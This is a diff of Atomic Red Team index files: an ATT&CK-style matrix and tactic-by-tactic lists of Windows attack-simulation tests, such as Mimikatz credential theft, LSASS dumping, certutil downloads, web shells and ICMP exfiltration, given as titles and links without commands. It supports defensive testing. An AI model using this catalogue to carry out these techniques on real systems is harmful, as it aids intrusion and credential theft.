| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](./T1135/T1135.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](./T1040/T1040.md) | [Remote Desktop Protocol](./T1076/T1076.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](./T1223/T1223.md) | [Hooking](./T1179/T1179.md) | [Password Policy Discovery](./T1201/T1201.md) | [Remote File Copy](./T1105/T1105.md) | [Email Collection](./T1114/T1114.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](./T1118/T1118.md) | [Change Default File Association](./T1042/T1042.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](./T1122/T1122.md) | [Input Prompt](./T1141/T1141.md) | [Permission Groups Discovery](./T1069/T1069.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](./T1179/T1179.md) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](./T1057/T1057.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](./T1113/T1113.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Launchctl](./T1152/T1152.md) | [Component Object Model Hijacking](./T1122/T1122.md) | [Image File Execution Options Injection](./T1183/T1183.md) | [DCShadow](./T1207/T1207.md) | [Keychain](./T1142/T1142.md) | [Query Registry](./T1012/T1012.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Local Job Scheduling](./T1168/T1168.md) | [Create Account](./T1136/T1136.md) | [Launch Daemon](./T1160/T1160.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](./T1018/T1018.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Mshta](./T1170/T1170.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [New Service](./T1050/T1050.md) | DLL Side-Loading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](./T1040/T1040.md) | [Security Software Discovery](./T1063/T1063.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [PowerShell](./T1086/T1086.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [Password Filter DLL](./T1174/T1174.md) | [System Information Discovery](./T1082/T1082.md) | [Windows Admin Shares](./T1077/T1077.md) | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Regsvcs/Regasm](./T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](./T1150/T1150.md) | [Disabling Security Tools](./T1089/T1089.md) | [Private Keys](./T1145/T1145.md) | [System Network Configuration Discovery](./T1016/T1016.md) | [Windows Remote Management](./T1028/T1028.md) | | | [Remote File Copy](./T1105/T1105.md) |
| | [Regsvr32](./T1117/T1117.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](./T1049/T1049.md) | | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
| | [Rundll32](./T1085/T1085.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Process Injection](./T1055/T1055.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](./T1033/T1033.md) | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scheduled Task](./T1053/T1053.md) | [Hooking](./T1179/T1179.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Service Discovery](./T1007/T1007.md) | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scripting](./T1064/T1064.md) | [Hypervisor](./T1062/T1062.md) | [Scheduled Task](./T1053/T1053.md) | [File Deletion](./T1107/T1107.md) | | [System Time Discovery](./T1124/T1124.md) | | | | [Uncommonly Used Port](./T1065/T1065.md) |
| | [Service Execution](./T1035/T1035.md) | [Image File Execution Options Injection](./T1183/T1183.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Permissions Modification](./T1222/T1222.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Signed Binary Proxy Execution](./T1218/T1218.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | [Signed Script Proxy Execution](./T1216/T1216.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](./T1165/T1165.md) | [Gatekeeper Bypass](./T1144/T1144.md) | | | | | | |
| | [Source](./T1153/T1153.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo](./T1169/T1169.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | [Space after Filename](./T1151/T1151.md) | [Launch Agent](./T1159/T1159.md) | [Sudo Caching](./T1206/T1206.md) | [HISTCONTROL](./T1148/T1148.md) | | | | | | |
| | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](./T1160/T1160.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](./T1158/T1158.md) | | | | | | |
| | [Trap](./T1154/T1154.md) | [Launchctl](./T1152/T1152.md) | [Web Shell](./T1100/T1100.md) | [Hidden Users](./T1147/T1147.md) | | | | | | |
| | [Trusted Developer Utilities](./T1127/T1127.md) | [Local Job Scheduling](./T1168/T1168.md) | | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Image File Execution Options Injection](./T1183/T1183.md) | | | | | | |
| | [Windows Management Instrumentation](./T1047/T1047.md) | [Logon Scripts](./T1037/T1037.md) | | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | [Windows Remote Management](./T1028/T1028.md) | [Modify Existing Service](./T1031/T1031.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | [XSL Script Processing](./T1220/T1220.md) | [Netsh Helper DLL](./T1128/T1128.md) | | [Indicator Removal on Host](./T1070/T1070.md) | | | | | | |
| | | [New Service](./T1050/T1050.md) | | [Indirect Command Execution](./T1202/T1202.md) | | | | | | |
| | | [Office Application Startup](./T1137/T1137.md) | | [Install Root Certificate](./T1130/T1130.md) | | | | | | |
| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [InstallUtil](./T1118/T1118.md) | | | | | | |
| | | [Plist Modification](./T1150/T1150.md) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Launchctl](./T1152/T1152.md) | | | | | | |
| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Masquerading](./T1036/T1036.md) | | | | | | |
| | | [Rc.common](./T1163/T1163.md) | | [Modify Registry](./T1112/T1112.md) | | | | | | |
| | | [Re-opened Applications](./T1164/T1164.md) | | [Mshta](./T1170/T1170.md) | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [NTFS File Attributes](./T1096/T1096.md) | | | | | | |
| | | [Registry Run Keys / Startup Folder](./T1060/T1060.md) | | [Network Share Connection Removal](./T1126/T1126.md) | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Obfuscated Files or Information](./T1027/T1027.md) | | | | | | |
| | | [Scheduled Task](./T1053/T1053.md) | | [Plist Modification](./T1150/T1150.md) | | | | | | |
| | | [Screensaver](./T1180/T1180.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Security Support Provider](./T1101/T1101.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Hollowing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Setuid and Setgid](./T1166/T1166.md) | | [Process Injection](./T1055/T1055.md) | | | | | | |
| | | Shortcut Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Startup Items](./T1165/T1165.md) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvr32](./T1117/T1117.md) | | | | | | |
| | | Systemd Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Rootkit](./T1014/T1014.md) | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Rundll32](./T1085/T1085.md) | | | | | | |
| | | [Trap](./T1154/T1154.md) | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Scripting](./T1064/T1064.md) | | | | | | |
| | | [Web Shell](./T1100/T1100.md) | | [Signed Binary Proxy Execution](./T1218/T1218.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Signed Script Proxy Execution](./T1216/T1216.md) | | | | | | |
| | | [Winlogon Helper DLL](./T1004/T1004.md) | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Space after Filename](./T1151/T1151.md) | | | | | | |
| | | | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Timestomp](./T1099/T1099.md) | | | | | | |
| | | | | [Trusted Developer Utilities](./T1127/T1127.md) | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [XSL Script Processing](./T1220/T1220.md) | | | | | | |
atomics/windows-index.md
+62 -12
View File
@@ -16,6 +16,7 @@
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- T1116 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1223 Compiled HTML File](./T1223/T1223.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
@@ -33,6 +34,7 @@
- [T1089 Disabling Security Tools](./T1089/T1089.md)
- Atomic Test #8: Unload Sysmon Filter Driver [windows]
- Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1107 File Deletion](./T1107/T1107.md)
@@ -53,6 +55,7 @@
- Atomic Test #6: icacls - Grant permission to specified user or group recursively [windows]
- Atomic Test #7: attrib - Remove read-only attribute [windows]
- T1006 File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1158 Hidden Files and Directories](./T1158/T1158.md)
- Atomic Test #4: Create Windows System File with Attrib [windows]
- Atomic Test #5: Create Windows Hidden File with Attrib [windows]
@@ -92,6 +95,7 @@
- [T1055 Process Injection](./T1055/T1055.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: Process Injection via PowerSploit [windows]
- Atomic Test #4: Process Injection via C# [windows]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
@@ -115,9 +119,13 @@
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1099 Timestomp](./T1099/T1099.md)
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1220 XSL Script Processing](./T1220/T1220.md)
- Atomic Test #1: MSXSL Bypass using local files [windows]
@@ -163,6 +171,7 @@
- [T1055 Process Injection](./T1055/T1055.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: Process Injection via PowerSploit [windows]
- Atomic Test #4: Process Injection via C# [windows]
- T1178 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053 Scheduled Task](./T1053/T1053.md)
- Atomic Test #1: At.exe Scheduled task [windows]
@@ -170,7 +179,8 @@
- Atomic Test #3: Scheduled task Remote [windows]
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
# persistence
- [T1015 Accessibility Features](./T1015/T1015.md)
@@ -249,12 +259,14 @@
- [T1180 Screensaver](./T1180/T1180.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1101 Security Support Provider](./T1101/T1101.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1023 Shortcut Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1019 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1209 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #2: Persistence Cleanup [windows]
@@ -272,6 +284,7 @@
- [T1010 Application Window Discovery](./T1010/T1010.md)
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- [T1217 Browser Bookmark Discovery](./T1217/T1217.md)
- T1482 Domain Trust Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1083 File and Directory Discovery](./T1083/T1083.md)
- Atomic Test #1: File and Directory Discovery [windows]
- Atomic Test #2: File and Directory Discovery [windows]
@@ -313,6 +326,7 @@
- [T1124 System Time Discovery](./T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# credential-access
- [T1098 Account Manipulation](./T1098/T1098.md)
@@ -328,6 +342,8 @@
- Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #7: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #9: Create Volume Shadow Copy with NTDS.dit [windows]
- Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows]
- [T1081 Credentials in Files](./T1081/T1081.md)
- Atomic Test #3: Mimikatz & Kittenz [windows]
- Atomic Test #4: Extracting credentials from files [windows]
@@ -339,8 +355,10 @@
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- [T1056 Input Capture](./T1056/T1056.md)
- Atomic Test #1: Input Capture [windows]
- [T1141 Input Prompt](./T1141/T1141.md)
- Atomic Test #1: PowerShell - Prompt User for Password [windows]
- T1208 Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1171 LLMNR/NBT-NS Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](./T1040/T1040.md)
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Packet Capture PowerShell [windows]
@@ -363,6 +381,8 @@
- [T1076 Remote Desktop Protocol](./T1076/T1076.md)
- Atomic Test #1: RDP [windows]
- [T1105 Remote File Copy](./T1105/T1105.md)
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -389,12 +409,12 @@
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: PowerShell [windows]
- [T1074 Data Staged](./T1074/T1074.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1005 Data from Local System](./T1005/T1005.md)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1114 Email Collection](./T1114/T1114.md)
- Atomic Test #1: T1114 Email Collection with PowerShell [windows]
- [T1056 Input Capture](./T1056/T1056.md)
- Atomic Test #1: Input Capture [windows]
- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -407,8 +427,12 @@
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- Atomic Test #2: Compress Data for Exfiltration With Rar [windows]
- [T1022 Data Encrypted](./T1022/T1022.md)
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- [T1030 Data Transfer Size Limits](./T1030/T1030.md)
- [T1048 Exfiltration Over Alternative Protocol](./T1048/T1048.md)
- Atomic Test #4: Exfiltration Over Alternative Protocol - ICMP [windows]
- T1041 Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -441,11 +465,12 @@
- Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #5: Invoke-AppPathBypass [windows]
- Atomic Test #6: PowerShell Add User [windows]
- Atomic Test #7: Powershell MsXml COM object [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #11: PowerShell Fileless Script Execution [windows]
- Atomic Test #7: Powershell MsXml COM object - no prompt [windows]
- Atomic Test #8: Powershell MsXml COM object - with prompt [windows]
- Atomic Test #9: Powershell XML requests [windows]
- Atomic Test #10: Powershell invoke mshta.exe download [windows]
- Atomic Test #11: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #12: PowerShell Fileless Script Execution [windows]
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
@@ -492,11 +517,13 @@
# command-and-control
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1090 Connection Proxy](./T1090/T1090.md)
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1132 Data Encoding](./T1132/T1132.md)
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -504,16 +531,39 @@
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1105 Remote File Copy](./T1105/T1105.md)
- T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- [T1071 Standard Application Layer Protocol](./T1071/T1071.md)
- Atomic Test #1: Malicious User Agents [windows]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1065 Uncommonly Used Port](./T1065/T1065.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# impact
- T1485 Data Destruction [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1489 Service Stop](./T1489/T1489.md)
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
- Atomic Test #2: Windows - Stop service using net.exe [windows]
- Atomic Test #3: Windows - Stop service by killing process [windows]
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# initial-access
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1193 Spearphishing Attachment](./T1193/T1193.md)
atomics/windows-matrix.md
+44 -40
View File
@@ -3,46 +3,49 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
